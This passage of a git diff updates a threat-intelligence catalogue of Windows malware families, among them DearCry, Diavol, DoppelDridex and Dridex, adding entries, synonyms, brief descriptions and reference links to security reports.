"https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html", + "https://www.youtube.com/watch?v=ElqmQDySy48" ], "synonyms": [ "DarkCrystal RAT" @@ -13235,6 +15253,41 @@ "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", "value": "DDKONG" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dealply", + "https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4f32b912-59a9-4dae-9118-28d78e01fbfc", + "value": "DealPly" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b", + "https://www.youtube.com/watch?v=qmCjtigVVR0", + "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf", + "https://www.youtube.com/watch?v=Hhx9Q2i7zGo", + "https://www.youtube.com/watch?v=MRTdGUy1lfw", + "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/" + ], + "synonyms": [ + "DoejoCrypt" + ], + "type": [] + }, + "uuid": "793f0f9d-fc1c-43e1-9010-2052a1cf696d", + "value": "dearcry" + }, { "description": "Also known as Wacatac ransomware due to its .wctc extension.", "meta": { @@ -13271,6 +15324,19 @@ "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", "value": "Decebal" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deep_rat", + "https://twitter.com/benkow_/status/1415797114794397701" + ], + "synonyms": [], + "type": [] + }, + "uuid": "355ace5a-ae57-45b8-b49d-e3286c4c18cc", + "value": "DeepRAT" + }, { "description": "Defray is ransomware that appeared in 2017, and is targeted ransomware, mainly on the healthcare vertical.\r\n\r\nThe distribution of Defray has several notable characteristics:\r\nAccording to Proofpoint:\r\n\"\r\nDefray is currently being spread via Microsoft Word document attachments in email\r\nThe campaigns are as small as several messages each\r\nThe lures are custom crafted to appeal to the intended set of potential victims\r\nThe recipients are individuals or distribution lists, e.g., group@ and websupport@\r\nGeographic targeting is in the UK and US\r\nVertical targeting varies by campaign and is narrow and selective\r\n\"", "meta": { @@ -13384,6 +15450,7 @@ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html", "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-firestone", @@ -13402,7 +15469,7 @@ "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", - "value": "Derusbi" + "value": "Derusbi (Windows)" }, { "description": "", @@ -13468,21 +15535,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", - "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/", - "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://securelist.com/cis-ransomware/104452/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/", "https://www.group-ib.com/media/iran-cybercriminals/", + "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une", + "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.acronis.com/en-us/articles/Dharma-ransomware/", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", - "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", + "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://twitter.com/JakubKroustek/status/1087808550309675009", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/" ], "synonyms": [ "Arena", @@ -13500,6 +15574,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", + "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF", "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", @@ -13517,11 +15592,30 @@ "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", "value": "DiamondFox" }, + { + "description": "A ransomware with potential ties to Wizard Spider.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol", + "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/", + "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/", + "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider", + "https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/", + "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/", + "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6fa944af-3def-437a-8a52-9234782b5bb8", + "value": "Diavol" + }, { "description": "APT10's fork of the (open-source) Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice", + "https://securelist.com/apt-trends-report-q1-2021/101967/", "https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html" ], "synonyms": [], @@ -13556,6 +15650,21 @@ "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", "value": "DirCrypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dirtymoe", + "https://decoded.avast.io/martinchlumecky/dirtymoe-3/", + "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/", + "https://decoded.avast.io/martinchlumecky/dirtymoe-1/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9f324aaf-a54e-4532-bfc1-b23f1a77abbf", + "value": "DirtyMoe" + }, { "description": "", "meta": { @@ -13603,6 +15712,7 @@ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/", "https://malwareindepth.com/shamoon-2012/", @@ -13726,6 +15836,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage", "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/", + "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/", "https://www.us-cert.gov/ncas/alerts/AA19-024A", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", @@ -13776,44 +15887,78 @@ "uuid": "d713f337-b9c7-406d-88e4-3352b2523c73", "value": "donut_injector" }, + { + "description": "DoppelDridex is a fork of Indrik Spider's Dridex malware. DoppelDridex has been run as a parallel operation to Dridex with a different malware versioning system, different RSA key, and with different infrastructure.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex", + "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true", + "https://redcanary.com/blog/grief-ransomware/", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b634a2ac-da01-43c0-b823-a235497a10a8", + "value": "DoppelDridex" + }, { "description": "Doppelpaymer is a ransomware family that encrypts user data and later on it asks for a ransom in order to restore original files. It is recognizable by its trademark file extension added to encrypted files: .doppeled. It also creates a note file named: \".how2decrypt.txt\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer", + "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/", "https://techcrunch.com/2020/03/01/visser-breach/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.ic3.gov/Media/News/2020/201215-1.pdf", + "https://twitter.com/vikas891/status/1385306823662587905", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c", "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html", "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.secureworks.com/research/threat-profiles/gold-heron", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/", + "https://redcanary.com/blog/grief-ransomware/", + "https://twitter.com/AltShiftPrtScn/status/1385103712918642688", + "http://www.secureworks.com/research/threat-profiles/gold-heron", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/" + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html" + ], + "synonyms": [ + "Pay OR Grief" ], - "synonyms": [], "type": [] }, "uuid": "16a76dcf-92cb-4371-8440-d6b3adbb081b", @@ -13864,6 +16009,19 @@ "uuid": "fc63c3ea-23ed-448d-9d66-3fb87ebea4ba", "value": "Dot Ransomware" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback", + "https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1cda1810-f705-4d6b-9c9e-f509f8c7f5c5", + "value": "DOUBLEBACK" + }, { "description": "", "meta": { @@ -13887,6 +16045,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", "https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", + "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], @@ -13902,6 +16061,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" ], "synonyms": [ @@ -14007,62 +16167,92 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/", - "https://adalogics.com/blog/the-state-of-advanced-code-injections", - "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", - "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction", - "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", - "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf", - "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", - "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", - "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", - "https://en.wikipedia.org/wiki/Maksim_Yakubets", - "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-drake", - "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", - "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://home.treasury.gov/news/press-releases/sm845", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://unit42.paloaltonetworks.com/travel-themed-phishing/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://twitter.com/TheDFIRReport/status/1356729371931860992", - "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf", "https://www.secureworks.com/research/threat-profiles/gold-heron", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf", - "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", - "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/", + "https://twitter.com/Cryptolaemus1/status/1407135648528711680", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf", - "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/", - "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/", "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://viql.github.io/dridex/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf", + "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://blog.lexfo.fr/dridex-malware.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes", + "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/", + "https://www.youtube.com/watch?v=1VB15_HgUkg", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", + "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/", + "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/", + "http://www.secureworks.com/research/threat-profiles/gold-heron", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", + "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/", + "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf", + "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", + "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf", + "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", + "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction", "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation", - "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/" + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://en.wikipedia.org/wiki/Maksim_Yakubets", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", + "https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://malwarebookreports.com/cryptone-cobalt-strike/", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://twitter.com/felixw3000/status/1382614469713530883?s=20" ], "synonyms": [], "type": [] @@ -14153,6 +16343,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack", "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/", + "https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20", "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/", "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", @@ -14164,7 +16355,9 @@ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko" ], - "synonyms": [], + "synonyms": [ + "TroyRAT" + ], "type": [] }, "uuid": "414f95e1-aabe-4aa9-b9be-53e0826f62c1", @@ -14229,6 +16422,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", + "https://docs.broadcom.com/doc/w32-duqu-11-en", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", 